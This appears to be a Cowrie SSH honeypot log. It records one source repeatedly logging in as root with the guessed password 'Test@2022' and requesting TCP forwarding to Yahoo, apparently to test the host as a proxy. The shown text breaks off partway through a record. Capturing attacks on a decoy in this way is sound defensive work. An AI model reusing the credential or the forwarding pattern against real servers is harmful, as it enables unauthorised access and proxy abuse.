{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:52.083552Z","src_ip":"213.209.150.239","session":"8e7874a82b68"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:52.140882Z","src_ip":"213.209.150.239","session":"8e7874a82b68"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":38860,"dst_ip":"1.2.3.4","dst_port":22,"session":"025ebfa6a64e","protocol":"ssh","message":"New connection: 213.209.150.239:38860 (1.2.3.4:22) [session: 025ebfa6a64e]","sensor":"my-vps","timestamp":"2025-08-26T01:05:52.186868Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:52.187895Z","src_ip":"213.209.150.239","session":"025ebfa6a64e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:52.234913Z","src_ip":"213.209.150.239","session":"025ebfa6a64e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:52.469308Z","src_ip":"213.209.150.239","session":"025ebfa6a64e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":15439,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:15439","sensor":"my-vps","timestamp":"2025-08-26T01:05:52.517064Z","session":"025ebfa6a64e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:52.564245Z","src_ip":"213.209.150.239","session":"025ebfa6a64e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":16734,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:16734","sensor":"my-vps","timestamp":"2025-08-26T01:05:52.701555Z","session":"025ebfa6a64e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:52.748690Z","src_ip":"213.209.150.239","session":"025ebfa6a64e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:52.797221Z","src_ip":"213.209.150.239","session":"025ebfa6a64e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":38916,"dst_ip":"1.2.3.4","dst_port":22,"session":"7445786a63e9","protocol":"ssh","message":"New connection: 213.209.150.239:38916 (1.2.3.4:22) [session: 7445786a63e9]","sensor":"my-vps","timestamp":"2025-08-26T01:05:52.843648Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:52.844273Z","src_ip":"213.209.150.239","session":"7445786a63e9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:52.891682Z","src_ip":"213.209.150.239","session":"7445786a63e9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:53.126463Z","src_ip":"213.209.150.239","session":"7445786a63e9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":32642,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:32642","sensor":"my-vps","timestamp":"2025-08-26T01:05:53.174588Z","session":"7445786a63e9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:53.221956Z","src_ip":"213.209.150.239","session":"7445786a63e9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":28906,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:28906","sensor":"my-vps","timestamp":"2025-08-26T01:05:53.357578Z","session":"7445786a63e9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:53.404835Z","src_ip":"213.209.150.239","session":"7445786a63e9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:53.452712Z","src_ip":"213.209.150.239","session":"7445786a63e9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":38962,"dst_ip":"1.2.3.4","dst_port":22,"session":"13420cda6fed","protocol":"ssh","message":"New connection: 213.209.150.239:38962 (1.2.3.4:22) [session: 13420cda6fed]","sensor":"my-vps","timestamp":"2025-08-26T01:05:53.508271Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:53.509098Z","src_ip":"213.209.150.239","session":"13420cda6fed"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:53.565737Z","src_ip":"213.209.150.239","session":"13420cda6fed"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:53.847826Z","src_ip":"213.209.150.239","session":"13420cda6fed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":20766,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:20766","sensor":"my-vps","timestamp":"2025-08-26T01:05:53.905849Z","session":"13420cda6fed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:53.962618Z","src_ip":"213.209.150.239","session":"13420cda6fed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":18316,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:18316","sensor":"my-vps","timestamp":"2025-08-26T01:05:54.118948Z","session":"13420cda6fed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:54.175522Z","src_ip":"213.209.150.239","session":"13420cda6fed"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:54.232969Z","src_ip":"213.209.150.239","session":"13420cda6fed"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":39062,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbd1a12dc4b4","protocol":"ssh","message":"New connection: 213.209.150.239:39062 (1.2.3.4:22) [session: bbd1a12dc4b4]","sensor":"my-vps","timestamp":"2025-08-26T01:05:54.288937Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:54.289769Z","src_ip":"213.209.150.239","session":"bbd1a12dc4b4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:54.346420Z","src_ip":"213.209.150.239","session":"bbd1a12dc4b4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:54.629286Z","src_ip":"213.209.150.239","session":"bbd1a12dc4b4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":25402,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:25402","sensor":"my-vps","timestamp":"2025-08-26T01:05:54.687178Z","session":"bbd1a12dc4b4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:54.744035Z","src_ip":"213.209.150.239","session":"bbd1a12dc4b4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":22841,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:22841","sensor":"my-vps","timestamp":"2025-08-26T01:05:54.898995Z","session":"bbd1a12dc4b4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:54.955743Z","src_ip":"213.209.150.239","session":"bbd1a12dc4b4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:55.013178Z","src_ip":"213.209.150.239","session":"bbd1a12dc4b4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":39131,"dst_ip":"1.2.3.4","dst_port":22,"session":"d00465b8b39e","protocol":"ssh","message":"New connection: 213.209.150.239:39131 (1.2.3.4:22) [session: d00465b8b39e]","sensor":"my-vps","timestamp":"2025-08-26T01:05:55.068871Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:55.070027Z","src_ip":"213.209.150.239","session":"d00465b8b39e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:55.126645Z","src_ip":"213.209.150.239","session":"d00465b8b39e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:55.408829Z","src_ip":"213.209.150.239","session":"d00465b8b39e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":17302,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:17302","sensor":"my-vps","timestamp":"2025-08-26T01:05:55.466456Z","session":"d00465b8b39e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:55.523226Z","src_ip":"213.209.150.239","session":"d00465b8b39e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":19666,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:19666","sensor":"my-vps","timestamp":"2025-08-26T01:05:55.679039Z","session":"d00465b8b39e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:55.735644Z","src_ip":"213.209.150.239","session":"d00465b8b39e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:55.793035Z","src_ip":"213.209.150.239","session":"d00465b8b39e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":39195,"dst_ip":"1.2.3.4","dst_port":22,"session":"c171cc0fe3ad","protocol":"ssh","message":"New connection: 213.209.150.239:39195 (1.2.3.4:22) [session: c171cc0fe3ad]","sensor":"my-vps","timestamp":"2025-08-26T01:05:55.840245Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:55.840784Z","src_ip":"213.209.150.239","session":"c171cc0fe3ad"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-h